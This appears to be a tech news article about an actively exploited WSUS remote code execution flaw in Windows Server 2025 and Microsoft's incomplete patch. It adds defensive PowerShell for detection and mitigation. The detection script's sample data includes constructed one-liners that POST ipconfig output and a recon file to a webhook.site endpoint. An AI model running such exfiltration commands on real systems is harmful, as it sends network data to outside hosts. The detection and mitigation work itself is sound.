Microsoft Windows Server Update Service Is Under Attack, What You Need To Know

Windows Server 2025 is currently open to a Remote Code Execution exploit via the Windows Server Update Service (WSUS), and at the time of this writing a fix from Microsoft has yet to fully patch the issue. Reports to The Register indicate that Microsoft's attempt to patch the exploit earlier this month didn't stop active exploitation, contrary to Microsoft's own page on the CVE, which reported that the issue was not yet publicly disclosed or exploited. Microsoft only partially patching a vulnerability calls back to recent issues with SharePoint, though this exploit currently seems more limited in scale than that one was. The attack also appears to be limited to Remote Code Execution through PowerShell rather than full arbitrary code execution that would let attackers do virtually anything they want on a target system.

Analysts speaking to The Register note that one proof of concept has been available since October 21st. Current examples of the attack indicate that hackers are gaining access to a system and performing network reconnaissance by executing PowerShell commands to gain information about a given network and exfiltrate it to a Webhook.site endpoint. As Trend Micro's Dustin Childs warns, "If the patch doesn't fully address the vulnerability, the existence of a patch actually increases the risk to enterprises. It leads people to think they are protected when in fact they aren't. We need to start holding them accountable not only for patches that break functionality, but also for patches that don't fix the security issues they document." 
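The reconnaissance-and-exfiltration pattern described above leaves a simple trace for defenders: a process command line that references a Webhook.site endpoint. The following PowerShell is an added example written for this article, not code from The Register, Trend Micro or Microsoft. It defines a small check, runs it over a few constructed sample command lines, and optionally applies the same check to live Security log process-creation events (Event ID 4688). The event parsing assumes "Include command line in process creation events" auditing is enabled; without it the CommandLine field is empty and nothing will match.

```powershell
# Added example, not from the article. Flag process command lines that reach out to
# webhook.site, the exfiltration endpoint reported in the WSUS attacks.
function Test-WebhookExfilCommandLine {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$ProcessName = '',
        [string]$ParentName  = ''
    )
    # The page reports PowerShell-based recon sending data to Webhook.site; both
    # indicators are matched case-insensitively (-match is case-insensitive by default).
    $hitsWebhook    = $CommandLine -match 'webhook\.site'
    $hitsPowerShell = ($CommandLine -match 'powershell') -or ($ProcessName -match 'powershell')
    if ($hitsWebhook) {
        [pscustomobject]@{
            Suspicious    = $true
            Reason        = if ($hitsPowerShell) { 'PowerShell -> webhook.site' } else { 'webhook.site reference' }
            NewProcess    = $ProcessName
            ParentProcess = $ParentName
            CommandLine   = $CommandLine
        }
    }
}

# Constructed sample command lines (not captured from a real incident) so the check
# can be exercised offline. Only the second and third should be flagged.
$samples = @(
    'powershell.exe -NoProfile -Command Get-WindowsUpdateLog',
    'powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri https://webhook.site/EXAMPLE-ID -Method POST -Body (ipconfig /all)"',
    'cmd.exe /c curl -X POST https://webhook.site/EXAMPLE-ID -d @recon.txt'
)
foreach ($s in $samples) {
    $r = Test-WebhookExfilCommandLine -CommandLine $s -ProcessName ($s.Split(' ')[0])
    if ($r) { $r | Format-List }
}

# Optional live hunt over the last 14 days of Security 4688 events (requires an
# elevated session and command-line auditing). Remove the leading '#' to enable.
# $events = Get-WinEvent -FilterHashtable @{ LogName='Security'; Id=4688; StartTime=(Get-Date).AddDays(-14) } -ErrorAction SilentlyContinue
# foreach ($e in $events) {
#     $data = @{}
#     foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
#     if ($data['CommandLine']) {
#         Test-WebhookExfilCommandLine -CommandLine $data['CommandLine'] `
#             -ProcessName $data['NewProcessName'] -ParentName $data['ParentProcessName']
#     }
# }
```

A match on webhook.site alone is a strong enough signal to triage on a WSUS host, since that service has no legitimate reason to post data there; the PowerShell indicator is recorded in the Reason field so analysts can prioritise hits that match the full pattern the reports describe.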


Microsoft's official documentation encourages potential victims to disable the WSUS Server Role on their servers and block inbound traffic to ports 8530 and 8531, both of which are meant to prevent the Windows Server Update Service from being exploited. However, that documentation also points to the October 23rd out-of-band security update as fixing the issue, which doesn't seem to be the case based on the reports we're still seeing of the exploit being active at the time of writing. Hopefully Microsoft fully patches out the exploit sooner rather than later; until then, we'd advise users to disable the Windows Server Update Service entirely.
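The two mitigations above (remove the WSUS role, block inbound 8530/8531) can be audited and applied from an elevated PowerShell session on the affected server. The script below is an added example written for this article, not Microsoft's own tooling; it assumes the WSUS role's feature name `UpdateServices` and service name `WsusService` as shipped on Windows Server, and it only makes changes when run with `-Apply`.

```powershell
# Added example, not Microsoft's guidance verbatim. Audit WSUS exposure and, with -Apply,
# remove the role and block its inbound ports. Run elevated on the WSUS server.
param([switch]$Apply)

Import-Module ServerManager   # Get-/Uninstall-WindowsFeature
Import-Module NetSecurity     # *-NetFirewallRule

# 1. Audit: is the WSUS role installed, and is anything listening on 8530/8531?
$role = Get-WindowsFeature -Name UpdateServices
Write-Host "WSUS role installed : $($role.Installed)"
$listeners = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalPort -in 8530, 8531 }
if ($listeners) {
    Write-Host "Listening on WSUS ports:"
    $listeners | Select-Object LocalAddress, LocalPort, OwningProcess | Format-Table -AutoSize
} else {
    Write-Host "Nothing listening on TCP 8530/8531."
}

if (-not $Apply) {
    Write-Host "Audit only. Re-run with -Apply to remove the role and block the ports."
    return
}

# 2. Stop and disable the WSUS service, then remove the role (and its management tools).
$svc = Get-Service -Name WsusService -ErrorAction SilentlyContinue
if ($svc) {
    Stop-Service -Name WsusService -Force
    Set-Service  -Name WsusService -StartupType Disabled
}
if ($role.Installed) {
    Uninstall-WindowsFeature -Name UpdateServices -IncludeManagementTools
}

# 3. Block inbound TCP 8530/8531 regardless, so a re-enabled role is still unreachable
#    from the network until a complete fix ships.
foreach ($port in 8530, 8531) {
    $name = "Block inbound WSUS TCP $port (mitigation)"
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Inbound -Protocol TCP `
            -LocalPort $port -Action Block -Profile Any | Out-Null
        Write-Host "Created firewall rule: $name"
    }
}
```

Removing the role also stops the server from distributing updates to its clients, so those clients need another update source (or a re-enabled WSUS behind the firewall rules) until Microsoft's fix is confirmed complete. The firewall block is applied even when the role is already gone, so that a later reinstall does not silently re-expose the service.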

Image Credit: Microsoft, WikiMedia Commons (unofficial Windows Server 2025 logo)